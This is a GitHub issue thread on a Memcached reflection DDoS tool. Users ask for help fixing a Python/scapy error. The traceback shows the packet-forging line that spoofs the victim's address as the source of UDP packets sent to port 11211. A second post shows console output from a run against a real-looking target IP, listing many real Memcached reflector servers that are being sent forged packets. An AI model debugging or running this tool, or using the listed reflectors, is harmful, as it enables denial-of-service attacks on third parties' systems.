649 / Memcrashed-DDoS-Exploit

DDoS attack tool for sending forged UDP packets to vulnerable Memcached servers obtained using Shodan API
1.33k stars 465 forks source link

Error Traceback #27

Open 3DThing opened 6 years ago

3DThing commented 6 years ago

Traceback (most recent call last): File "/usr/lib/python3.6/site-packages/scapy/fields.py", line 238, in h2i inet_aton(x) OSError: illegal IP address string passed to inet_aton

During handling of the above exception, another exception occurred:

Traceback (most recent call last): File "Memcrashed.py", line 118, in send(IP(src=target, dst='%s' % i) / UDP(dport=11211)/Raw(load=data), count=power) File "/usr/lib/python3.6/site-packages/scapy/base_classes.py", line 240, in call i.init(*args, **kargs) File "/usr/lib/python3.6/site-packages/scapy/packet.py", line 134, in init self.fields[f] = self.get_field(f).any2i(self, v) File "/usr/lib/python3.6/site-packages/scapy/fields.py", line 259, in any2i return self.h2i(pkt,x) File "/usr/lib/python3.6/site-packages/scapy/fields.py", line 240, in h2i x = Net(x) File "/usr/lib/python3.6/site-packages/scapy/base_classes.py", line 90, in init self.parsed,self.netmask = self._parse_net(net) File "/usr/lib/python3.6/site-packages/scapy/base_classes.py", line 83, in _parse_net tmp[0]=socket.gethostbyname(tmp[0]) socket.gaierror: [Errno -2] Name does not resolve

Help, what is that?

sejozawer commented 6 years ago

Maybe it can help you https://pp.userapi.com/c845124/v845124885/14fda/XwM3z-Cwalk.jpg

nyashkin commented 6 years ago

I'm using Windows [*] Ready to engage target 104.27.146.188? <Y/n>: y [+] Sending 1 forged UDP packet to: 222.122.197.15 .[+] Sending 1 forged UDP packet to: 198.100.158.75 .[+] Sending 1 forged UDP packet to: 134.119.204.36 .[+] Sending 1 forged UDP packet to: 172.247.51.235 .[+] Sending 1 forged UDP packet to: 101.132.42.240 .[+] Sending 1 forged UDP packet to: 198.200.41.122 .[+] Sending 1 forged UDP packet to: 145.239.27.188 .[+] Sending 1 forged UDP packet to: 115.28.172.215 .[+] Sending 1 forged UDP packet to: 114.55.230.206 .[+] Sending 1 forged UDP packet to: 103.9.76.214 .[+] Sending 1 forged UDP packet to: 198.200.41.52 .[+] Sending 1 forged UDP packet to: 178.20.158.215 .[+] Sending 1 forged UDP packet to: 47.104.29.64 .[+] Sending 1 forged UDP packet to: 64.32.23.91 .[+] Sending 1 forged UDP packet to: 122.214.243.72 .[+] Sending 1 forged UDP packet to: 93.99.40.26 .[+] Sending 1 forged UDP packet to: 213.136.83.57 .[+] Sending 1 forged UDP packet to: 119.90.126.123 .[+] Sending 1 forged UDP packet to: 198.204.247.42 .[+] Sending 1 forged UDP packet to: 45.199.135.128 .[+] Sending 1 forged UDP packet to: 66.220.11.154 .[+] Sending 1 forged UDP packet to: 2a01:4f8:212:1343::136 Traceback (most recent call last): File "C:\Users\V\AppData\Local\Programs\Python\Python36\lib\site-packages\scap y\fields.py", line 238, in h2i inet_aton(x) OSError: illegal IP address string passed to inet_aton